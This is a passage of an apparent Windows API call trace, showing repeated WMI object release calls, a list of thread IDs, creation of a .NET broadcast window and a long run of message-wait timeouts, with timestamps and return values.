WbemDefPath:IUnknown:Release (This=0x560efa0) returned 0x1 [0239.726] WbemDefPath:IUnknown:Release (This=0x560efa0) returned 0x0 [0239.726] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.726] WbemDefPath:IUnknown:Release (This=0x561aba0) returned 0x1 [0239.726] WbemDefPath:IUnknown:Release (This=0x561aba0) returned 0x0 [0239.726] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.726] WbemDefPath:IUnknown:Release (This=0x560eec0) returned 0x1 [0239.726] WbemDefPath:IUnknown:Release (This=0x560eec0) returned 0x0 [0239.726] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.726] WbemDefPath:IUnknown:Release (This=0x561a820) returned 0x1 [0239.726] WbemDefPath:IUnknown:Release (This=0x561a820) returned 0x0 [0239.726] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.726] WbemDefPath:IUnknown:Release (This=0x5631498) returned 0x1 [0239.726] WbemDefPath:IUnknown:Release (This=0x5631498) returned 0x0 [0239.727] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.727] WbemDefPath:IUnknown:Release (This=0x5637fe0) returned 0x1 [0239.727] WbemDefPath:IUnknown:Release (This=0x5637fe0) returned 0x0 [0239.727] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.727] WbemDefPath:IUnknown:Release (This=0x56445a8) returned 0x1 [0239.727] WbemDefPath:IUnknown:Release (This=0x56445a8) returned 0x0 [0239.727] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.727] WbemDefPath:IUnknown:Release (This=0x560eb40) returned 0x1 [0239.727] WbemDefPath:IUnknown:Release (This=0x560eb40) returned 0x0 [0239.727] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.727] WbemDefPath:IUnknown:Release (This=0x5631658) returned 0x1 [0239.727] WbemDefPath:IUnknown:Release (This=0x5631658) returned 0x0 [0239.727] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.727] WbemDefPath:IUnknown:Release (This=0x5638a60) returned 0x1 [0239.727] WbemDefPath:IUnknown:Release (This=0x5638a60) returned 0x0 [0239.727] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.727] WbemDefPath:IUnknown:Release (This=0x561a4a0) returned 0x1 [0239.728] WbemDefPath:IUnknown:Release (This=0x561a4a0) returned 0x0 [0239.728] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.728] WbemDefPath:IUnknown:Release (This=0x561a200) returned 0x1 [0239.728] WbemDefPath:IUnknown:Release (This=0x561a200) returned 0x0 [0239.728] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.728] WbemDefPath:IUnknown:Release (This=0x5644228) returned 0x1 [0239.728] WbemDefPath:IUnknown:Release (This=0x5644228) returned 0x0 [0239.728] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.728] WbemDefPath:IUnknown:Release (This=0x56312d8) returned 0x1 [0239.728] WbemDefPath:IUnknown:Release (This=0x56312d8) returned 0x0 [0239.728] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.728] WbemDefPath:IUnknown:Release (This=0x5638360) returned 0x1 [0239.728] WbemDefPath:IUnknown:Release (This=0x5638360) returned 0x0 [0239.728] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.728] WbemDefPath:IUnknown:Release (This=0x5637d40) returned 0x1 [0239.728] WbemDefPath:IUnknown:Release (This=0x5637d40) returned 0x0 [0239.728] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.729] WbemDefPath:IUnknown:Release (This=0x5631118) returned 0x1 [0239.729] WbemDefPath:IUnknown:Release (This=0x5631118) returned 0x0 [0239.729] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.729] WbemDefPath:IUnknown:Release (This=0x560f320) returned 0x1 [0239.729] WbemDefPath:IUnknown:Release (This=0x560f320) returned 0x0 [0239.729] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.729] WbemDefPath:IUnknown:Release (This=0x5630cb8) returned 0x1 [0239.729] WbemDefPath:IUnknown:Release (This=0x5630cb8) returned 0x0 [0239.729] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.729] WbemDefPath:IUnknown:Release (This=0x560f780) returned 0x1 [0239.729] WbemDefPath:IUnknown:Release (This=0x560f780) returned 0x0 [0239.729] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.729] WbemDefPath:IUnknown:Release (This=0x5644458) returned 0x1 [0239.729] WbemDefPath:IUnknown:Release (This=0x5644458) returned 0x0 [0239.729] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.729] WbemDefPath:IUnknown:Release (This=0x5619da0) returned 0x1 [0239.729] WbemDefPath:IUnknown:Release (This=0x5619da0) returned 0x0 [0239.730] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.730] WbemDefPath:IUnknown:Release (This=0x561ac80) returned 0x1 [0239.730] WbemDefPath:IUnknown:Release (This=0x561ac80) returned 0x0 [0239.730] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.730] WbemDefPath:IUnknown:Release (This=0x53abde8) returned 0x1 [0239.730] WbemDefPath:IUnknown:Release (This=0x53abde8) returned 0x0 [0239.730] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.730] WbemDefPath:IUnknown:Release (This=0x5630f58) returned 0x1 [0239.730] WbemDefPath:IUnknown:Release (This=0x5630f58) returned 0x0 [0239.730] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.730] WbemDefPath:IUnknown:Release (This=0x5630bd8) returned 0x1 [0239.730] WbemDefPath:IUnknown:Release (This=0x5630bd8) returned 0x0 [0239.730] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.730] WbemDefPath:IUnknown:Release (This=0x560f5c0) returned 0x1 [0239.730] WbemDefPath:IUnknown:Release (This=0x560f5c0) returned 0x0 [0239.730] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.730] WbemDefPath:IUnknown:Release (This=0x561a900) returned 0x1 [0239.730] WbemDefPath:IUnknown:Release (This=0x561a900) returned 0x0 [0239.731] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.731] WbemDefPath:IUnknown:Release (This=0x561a120) returned 0x1 [0239.731] WbemDefPath:IUnknown:Release (This=0x561a120) returned 0x0 [0239.731] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.731] WbemDefPath:IUnknown:Release (This=0x560ec20) returned 0x1 [0239.731] WbemDefPath:IUnknown:Release (This=0x560ec20) returned 0x0 [0239.731] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.731] WbemDefPath:IUnknown:Release (This=0x5631738) returned 0x1 [0239.731] WbemDefPath:IUnknown:Release (This=0x5631738) returned 0x0 [0239.731] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.731] WbemDefPath:IUnknown:Release (This=0x560f400) returned 0x1 [0239.731] WbemDefPath:IUnknown:Release (This=0x560f400) returned 0x0 [0239.731] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.731] WbemDefPath:IUnknown:Release (This=0x561a580) returned 0x1 [0239.731] WbemDefPath:IUnknown:Release (This=0x561a580) returned 0x0 [0239.731] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.731] WbemDefPath:IUnknown:Release (This=0x5644308) returned 0x1 [0239.731] WbemDefPath:IUnknown:Release (This=0x5644308) returned 0x0 [0239.732] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.732] WbemDefPath:IUnknown:Release (This=0x56380c0) returned 0x1 [0239.732] WbemDefPath:IUnknown:Release (This=0x56380c0) returned 0x0 [0239.732] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.732] WbemDefPath:IUnknown:Release (This=0x56313b8) returned 0x1 [0239.732] WbemDefPath:IUnknown:Release (This=0x56313b8) returned 0x0 [0239.732] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.732] WbemDefPath:IUnknown:Release (This=0x560f240) returned 0x1 [0239.732] WbemDefPath:IUnknown:Release (This=0x560f240) returned 0x0 [0239.732] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.732] WbemDefPath:IUnknown:Release (This=0x561a2e0) returned 0x1 [0239.732] WbemDefPath:IUnknown:Release (This=0x561a2e0) returned 0x0 [0239.732] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.732] WbemDefPath:IUnknown:Release (This=0x5637e20) returned 0x1 [0239.732] WbemDefPath:IUnknown:Release (This=0x5637e20) returned 0x0 [0239.732] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.732] WbemDefPath:IUnknown:Release (This=0x53ac248) returned 0x1 [0239.732] WbemDefPath:IUnknown:Release (This=0x53ac248) returned 0x0 [0239.733] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.733] WbemDefPath:IUnknown:Release (This=0x5631038) returned 0x1 [0239.733] WbemDefPath:IUnknown:Release (This=0x5631038) returned 0x0 [0239.733] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.733] WbemDefPath:IUnknown:Release (This=0x5630a18) returned 0x1 [0239.733] WbemDefPath:IUnknown:Release (This=0x5630a18) returned 0x0 [0239.733] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.733] WbemDefPath:IUnknown:Release (This=0x5644538) returned 0x1 [0239.733] WbemDefPath:IUnknown:Release (This=0x5644538) returned 0x0 [0239.733] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.733] WbemDefPath:IUnknown:Release (This=0x5619e80) returned 0x1 [0239.733] WbemDefPath:IUnknown:Release (This=0x5619e80) returned 0x0 [0239.733] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.733] WbemDefPath:IUnknown:Release (This=0x5638980) returned 0x1 [0239.733] WbemDefPath:IUnknown:Release (This=0x5638980) returned 0x0 [0239.733] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.733] WbemDefPath:IUnknown:Release (This=0x56387c0) returned 0x1 [0239.733] WbemDefPath:IUnknown:Release (This=0x56387c0) returned 0x0 [0239.734] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.734] WbemDefPath:IUnknown:Release (This=0x560f080) returned 0x1 [0239.734] WbemDefPath:IUnknown:Release (This=0x560f080) returned 0x0 [0239.734] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.734] WbemDefPath:IUnknown:Release (This=0x5630858) returned 0x1 [0239.734] WbemDefPath:IUnknown:Release (This=0x5630858) returned 0x0 [0239.734] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.734] WbemDefPath:IUnknown:Release (This=0x561a9e0) returned 0x1 [0239.734] WbemDefPath:IUnknown:Release (This=0x561a9e0) returned 0x0 [0239.734] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.734] WbemDefPath:IUnknown:Release (This=0x56386e0) returned 0x1 [0239.734] WbemDefPath:IUnknown:Release (This=0x56386e0) returned 0x0 [0239.734] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.734] WbemDefPath:IUnknown:Release (This=0x5630938) returned 0x1 [0239.734] WbemDefPath:IUnknown:Release (This=0x5630938) returned 0x0 [0239.734] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.734] WbemDefPath:IUnknown:Release (This=0x5638600) returned 0x1 [0239.734] WbemDefPath:IUnknown:Release (This=0x5638600) returned 0x0 [0239.735] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.735] WbemDefPath:IUnknown:Release (This=0x561a660) returned 0x1 [0239.735] WbemDefPath:IUnknown:Release (This=0x561a660) returned 0x0 [0239.735] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.735] WbemDefPath:IUnknown:Release (This=0x560ed00) returned 0x1 [0239.735] WbemDefPath:IUnknown:Release (This=0x560ed00) returned 0x0 [0239.735] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.735] WbemDefPath:IUnknown:Release (This=0x56443e8) returned 0x1 [0239.735] WbemDefPath:IUnknown:Release (This=0x56443e8) returned 0x0 [0239.735] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.735] WbemDefPath:IUnknown:Release (This=0x560e980) returned 0x1 [0239.735] WbemDefPath:IUnknown:Release (This=0x560e980) returned 0x0 [0239.735] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.735] WbemDefPath:IUnknown:Release (This=0x560f860) returned 0x1 [0239.735] WbemDefPath:IUnknown:Release (This=0x560f860) returned 0x0 [0239.735] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.735] WbemDefPath:IUnknown:Release (This=0x5638440) returned 0x1 [0239.735] WbemDefPath:IUnknown:Release (This=0x5638440) returned 0x0 [0239.736] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.736] WbemDefPath:IUnknown:Release (This=0x560f4e0) returned 0x1 [0239.736] WbemDefPath:IUnknown:Release (This=0x560f4e0) returned 0x0 [0239.736] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.736] WbemDefPath:IUnknown:Release (This=0x5644618) returned 0x1 [0239.736] WbemDefPath:IUnknown:Release (This=0x5644618) returned 0x0 [0239.736] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.736] WbemDefPath:IUnknown:Release (This=0x5619f60) returned 0x1 [0239.736] WbemDefPath:IUnknown:Release (This=0x5619f60) returned 0x0 [0239.736] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.736] WbemDefPath:IUnknown:Release (This=0x560f160) returned 0x1 [0239.736] WbemDefPath:IUnknown:Release (This=0x560f160) returned 0x0 [0239.736] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.736] WbemDefPath:IUnknown:Release (This=0x560f6a0) returned 0x1 [0239.736] WbemDefPath:IUnknown:Release (This=0x560f6a0) returned 0x0 [0239.736] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.737] WbemDefPath:IUnknown:Release (This=0x5644298) returned 0x1 [0239.737] WbemDefPath:IUnknown:Release (This=0x5644298) returned 0x0 [0239.737] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.737] WbemDefPath:IUnknown:Release (This=0x561aac0) returned 0x1 [0239.737] WbemDefPath:IUnknown:Release (This=0x561aac0) returned 0x0 [0239.737] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.737] WbemDefPath:IUnknown:Release (This=0x5638280) returned 0x1 [0239.737] WbemDefPath:IUnknown:Release (This=0x5638280) returned 0x0 [0239.737] CoGetContextToken (in: pToken=0x461f5a4 | out: pToken=0x461f5a4) returned 0x0 [0239.737] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.737] WbemLocator:IUnknown:Release (This=0x56429d0) returned 0x1 [0239.737] WbemLocator:IUnknown:Release (This=0x56429d0) returned 0x0 [0239.737] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.737] WbemLocator:IUnknown:Release (This=0x563f868) returned 0x1 [0239.738] WbemLocator:IUnknown:Release (This=0x563f868) returned 0x0 [0239.844] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.844] WbemLocator:IUnknown:Release (This=0x5642a30) returned 0x1 [0239.844] WbemLocator:IUnknown:Release (This=0x5642a30) returned 0x0 [0239.845] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.845] WbemLocator:IUnknown:Release (This=0x5642910) returned 0x1 [0239.845] WbemLocator:IUnknown:Release (This=0x5642910) returned 0x0 [0239.845] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.845] WbemLocator:IUnknown:Release (This=0x563fc28) returned 0x1 [0239.845] WbemLocator:IUnknown:Release (This=0x563fc28) returned 0x0 [0239.845] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.845] WbemLocator:IUnknown:Release (This=0x563f688) returned 0x1 [0239.845] WbemLocator:IUnknown:Release (This=0x563f688) returned 0x0 [0239.846] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.846] WbemLocator:IUnknown:Release (This=0x563fb38) returned 0x1 [0239.846] WbemLocator:IUnknown:Release (This=0x563fb38) returned 0x0 [0239.847] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.847] WbemLocator:IUnknown:Release (This=0x563f368) returned 0x1 [0239.847] WbemLocator:IUnknown:Release (This=0x563f368) returned 0x0 [0239.847] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.847] IUnknown:Release (This=0x560db08) returned 0x1 [0239.847] IUnknown:Release (This=0x560db08) returned 0x0 [0239.847] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.848] WbemLocator:IUnknown:Release (This=0x55aa830) returned 0x1 [0239.848] WbemLocator:IUnknown:Release (This=0x55aa830) returned 0x0 [0239.848] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.848] WbemLocator:IUnknown:Release (This=0x563f958) returned 0x1 [0239.848] WbemLocator:IUnknown:Release (This=0x563f958) returned 0x0 [0239.849] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.849] WbemLocator:IUnknown:Release (This=0x563fe08) returned 0x1 [0239.849] WbemLocator:IUnknown:Release (This=0x563fe08) returned 0x0 [0239.849] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.849] WbemLocator:IUnknown:Release (This=0x563fa48) returned 0x1 [0239.849] WbemLocator:IUnknown:Release (This=0x563fa48) returned 0x0 [0239.850] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.850] WbemLocator:IUnknown:Release (This=0x5642830) returned 0x1 [0239.850] WbemLocator:IUnknown:Release (This=0x5642830) returned 0x0 [0239.850] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.850] WbemLocator:IUnknown:Release (This=0x5642970) returned 0x1 [0239.850] WbemLocator:IUnknown:Release (This=0x5642970) returned 0x0 [0239.850] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.850] WbemLocator:IUnknown:Release (This=0x563f548) returned 0x1 [0239.850] WbemLocator:IUnknown:Release (This=0x563f548) returned 0x0 [0239.851] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.851] WbemLocator:IUnknown:Release (This=0x5642a90) returned 0x1 [0239.851] WbemLocator:IUnknown:Release (This=0x5642a90) returned 0x0 [0239.851] IUnknown:Release (This=0x6d0ca0) returned 0x0 Thread: id = 96 os_tid = 0xf30 Thread: id = 122 os_tid = 0xf48 Thread: id = 123 os_tid = 0xf4c Thread: id = 124 os_tid = 0xf50 Thread: id = 125 os_tid = 0xf54 [0188.026] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0188.028] ResetEvent (hEvent=0x270) returned 1 Thread: id = 127 os_tid = 0xf5c Thread: id = 128 os_tid = 0xf64 Thread: id = 151 os_tid = 0xf88 Thread: id = 152 os_tid = 0xf8c [0200.255] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0200.258] SetConsoleCtrlHandler (HandlerRoutine=0x4b40b5e, Add=1) returned 1 [0200.259] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0200.260] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0200.261] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", lpWndClass=0x2683240 | out: lpWndClass=0x2683240) returned 0 [0200.263] CoTaskMemAlloc (cb=0x56) returned 0x546db08 [0200.263] RegisterClassW (lpWndClass=0x5ecf138) returned 0xc1ba [0200.263] CoTaskMemFree (pv=0x546db08) [0200.264] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x900cc [0200.265] NtdllDefWindowProc_W () returned 0x1 [0200.266] NtdllDefWindowProc_W () returned 0x0 [0200.266] NtdllDefWindowProc_W () returned 0x0 [0200.266] NtdllDefWindowProc_W () returned 0x0 [0200.266] NtdllDefWindowProc_W () returned 0x0 [0200.267] SetEvent (hEvent=0x5b8) returned 1 [0200.278] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.394] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.565] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.730] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0200.879] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0201.036] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0201.212] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0201.334] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0201.471] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0201.596] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0201.814] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0201.988] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0202.204] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0202.386] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0202.563] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0202.782] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0202.916] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0203.094] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0203.327] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0203.463] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0203.973] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0204.221] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0204.476] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0204.727] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0205.013] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0205.191] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0205.365] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0205.521] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0205.710] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0205.986] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0206.136] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0206.290] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0206.468] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0206.689] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0207.116] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0207.367] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0207.545] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0207.712] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0207.858] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0208.070] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0208.349] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0208.617] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0208.916] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0209.171] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0209.345] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0209.505] 